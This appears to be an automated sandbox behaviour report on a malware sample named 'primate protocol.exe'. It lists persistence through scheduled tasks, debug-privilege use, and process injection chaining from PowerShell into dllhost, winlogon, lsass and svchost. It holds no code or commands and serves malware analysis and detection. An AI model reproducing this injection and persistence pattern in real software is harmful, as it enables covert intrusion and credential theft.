Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\systemprocess.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\host.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 2492 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 2492 wrote to memory of 5948 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 2492 wrote to memory of 5948 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 2492 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 2492 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 3880 wrote to memory of 4756 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3880 wrote to memory of 4756 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1060 wrote to memory of 4760 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 1060 wrote to memory of 4760 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 1928 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 1928 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 3880 wrote to memory of 4036 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 3880 wrote to memory of 4036 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 3880 wrote to memory of 2592 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3880 wrote to memory of 2592 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3148 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3148 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3148 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3148 wrote to memory of 336 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3148 wrote to memory of 408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3148 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3148 wrote to memory of 1072 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3148 wrote to memory of 1080 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

